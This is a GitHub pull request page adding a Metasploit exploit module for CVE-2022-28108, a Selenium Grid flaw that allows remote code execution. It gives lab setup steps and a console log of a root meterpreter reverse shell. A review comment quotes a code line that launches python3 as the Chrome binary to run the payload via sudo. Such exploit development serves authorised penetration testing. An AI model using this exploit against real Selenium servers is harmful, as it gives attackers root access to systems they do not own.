Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add Selenium Chrome RCE module (CVE-2022-28108) #19769

Open
wants to merge 16 commits into
base: master
Choose a base branch
from
Open

Add Selenium Chrome RCE module (CVE-2022-28108) #19769

wants to merge 16 commits into from
+244 −0

Conversation

Takahiro-Yoko
Copy link
Contributor

@Takahiro-Yoko Takahiro-Yoko commented Dec 26, 2024
edited
Loading

One of #19753
Firefox PR: #19771
File read PR: #19781

Vulnerable Application

Selenium Server (Grid) before 4.0.0-alpha-7 allows CSRF because it permits non-JSON content types
such as application/x-www-form-urlencoded, multipart/form-data, and text/plain.

The vulnerability affects:

* Selenium Server (Grid) before 4.0.0-alpha-7

This module was successfully tested on:

* selenium/standalone-chrome:3.141.59 installed with Docker on Ubuntu 24.04
* selenium/standalone-chrome:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 24.04

Installation

  1. docker pull selenium/standalone-chrome:3.141.59

  2. docker run -d -p 4444:4444 -p 7900:7900 --shm-size="2g" selenium/standalone-chrome:3.141.59

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108
  4. Do: run lhost=<lhost> rhost=<rhost>
  5. You should get a meterpreter

Options

Scenarios

msf6 > use exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108
[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > run lhost=192.168.56.1 rhost=192.168.56.16 rport=4444
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 3.141.59 detected, which is vulnerable.
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:33274) at 2024-12-30 13:36:57 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 172.17.0.5
OS           : Ubuntu 20.04 (Linux 6.8.0-51-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

@Takahiro-Yoko Takahiro-Yoko changed the title Add selenium chrome rce module (CVE-2022-28108) Add Selenium Chrome RCE module (CVE-2022-28108) Dec 27, 2024
@Takahiro-Yoko Takahiro-Yoko mentioned this pull request Dec 28, 2024
Open
bcoles
bcoles reviewed Dec 28, 2024
View reviewed changes
modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb Outdated Show resolved Hide resolved
modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb Outdated
'browserName' => 'chrome',
'goog:chromeOptions' => {
'binary' => '/usr/bin/python3',
'args' => ["-cimport os; os.system('sudo su root -c \"#{payload.encoded}\"')"]
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Presumably this will fail unless the user running Selenium can elevate to root (without a password)?

Obtaining a low-privileged shell is likely to be a more robust approach. If the user has permission to elevate privileges with passwordless sudo, the operator can elevate their session themselves.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks!

When using this exploit against the official Selenium Docker image, we need to elevate to root (which can be done without a password) for the exploit to succeed. The normal seluser may not have the necessary permissions to execute the payload. However, this isn't always the case, so I added a check to determine whether the user can elevate to root without a password. 9bfccc4 Does this approach seem acceptable?

modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb Outdated Show resolved Hide resolved
modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb Show resolved Hide resolved
@Takahiro-Yoko
Use send_request_cgi
6c5952d
@Takahiro-Yoko
Review fix
9bfccc4 
  * add check if sudo without password possible
  * base64 encode payload
Takahiro-Yoko and others added 5 commits December 28, 2024 14:39
@Takahiro-Yoko
Update vulnerable version
7ecc1cb
@Takahiro-Yoko @bcoles
Update modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022…
9f20c57 
…_28108.rb


Improve version detection messaging

Co-authored-by: bcoles <[email protected]>
@Takahiro-Yoko
Add response check
6577a18
@Takahiro-Yoko
Minor improve
86bd1c2 
 * enable fetch_delete
 * avoid using single quotes
 * update doc
@Takahiro-Yoko
Improve check
bbc282e
@Takahiro-Yoko Takahiro-Yoko mentioned this pull request Jan 1, 2025
Open
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@bcoles bcoles bcoles left review comments

At least 1 approving review is required to merge this pull request.

Assignees
No one assigned
Labels
docs module
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
2 participants
@Takahiro-Yoko @bcoles